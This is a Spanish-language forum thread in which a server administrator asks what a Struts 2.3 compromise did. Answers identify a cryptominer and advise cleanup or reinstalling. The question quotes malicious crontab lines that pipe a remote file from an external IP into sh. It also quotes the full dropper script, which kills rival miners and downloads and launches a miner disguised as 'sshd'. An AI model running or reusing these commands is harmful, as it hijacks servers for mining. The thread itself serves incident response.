Struts2.3 Ataque Cero Día explotado: CronJob siendo creado

3

¿Puede alguien ayudar a entender qué se está haciendo exactamente a través de este ataque? Estaba usando Struts2.3 en el entorno Jboss5. Tenía algunos crontabs instalados, que desaparecieron, pero estas dos líneas se ven en crontab.

#*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
#*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh

A continuación se encuentra el script que se encuentra en el archivo logo.jpg que se obtuvo a través de 'wget' desde 91.230.47.40

#!/bin/sh
rm -rf /var/tmp/jmpmxfyhiz.conf
ps auxf|grep -v grep|grep -v xxtyligbex|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "jmpmxfyhiz"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "xxtyligbex" -e "tmbllmjcex" -e "pclfzagbkh" -e "dqpuewpvxz" -e "gzvcdujihq" -e "bevgesdhbs"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/xxtyligbex.conf
rm -rf /var/tmp/xxtyligbex.conf
curl -o /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
wget -O /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
chmod 777 /var/tmp/sshd
rm -rf /var/tmp/sshd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker
else
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker_na
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker_na
fi
chmod +x /var/tmp/sshd
cd /var/tmp
proc='grep -c ^processor /proc/cpuinfo'
cores=$((($proc+1)/2))
num=$(($cores*3))
sysctl -w vm.nr_hugepages='$num'
nohup ./sshd -c xxtyligbex.conf -t 'echo $cores' >/dev/null &
nohup ./sshd -c xxtyligbex.conf -t 'echo $cores' >/dev/null &
else
echo "runing....."
fi

Por favor ayúdame a entender lo que se está haciendo a través de esto. También ayúdame a eliminar la posibilidad de que se instale algún malware en mi servidor. Para cubrir la vulnerabilidad, he trasladado mis proyectos a Struts 2.5. Aún así, el crontab sigue regresando incluso si los quito.

    
pregunta Anirudh shetty 27.06.2017 - 06:53
fuente

2 respuestas

6

Las acciones descritas instalan una herramienta "kworker" en su servidor, que parece ser un minero de bitcoin, a Virustotal.

Dado que los registros aparecen en el archivo / etc / crontab, lo más probable es que haya instalado un paquete con tojan en su sistema.

Para resolver este problema, recomendaría reinstalar el sistema operativo en su servidor, ya que la caja ya era propiedad de los atacantes y es posible que también hayan instalado otro malware.

    
respondido por el Valery Marchuk 27.06.2017 - 11:59
fuente
1

Recientemente he visto un ataque similar. Esto es lo que debe hacer:

Encuentre el shell web ... es muy probable que sea uno de estos: enlace por lo tanto, un comando como 'buscar / -iname "wso.php" -type f' debería ayudarlo a encontrarlo. También debe haber un index.html y un cargador ascendente llamado "ajis.phtml" o similar en ese directorio. Eliminar esos archivos. Elimine los archivos en "/ var / tmp" que es donde se encuentran el archivo sshd malicioso y la configuración del grupo de minería. Actualiza Struts, reinicia y eso es todo ...

obviamente elimina los cronjobs ...

saludos

    
respondido por el Klaus Schwarz 27.06.2017 - 18:04
fuente

Lea otras preguntas en las etiquetas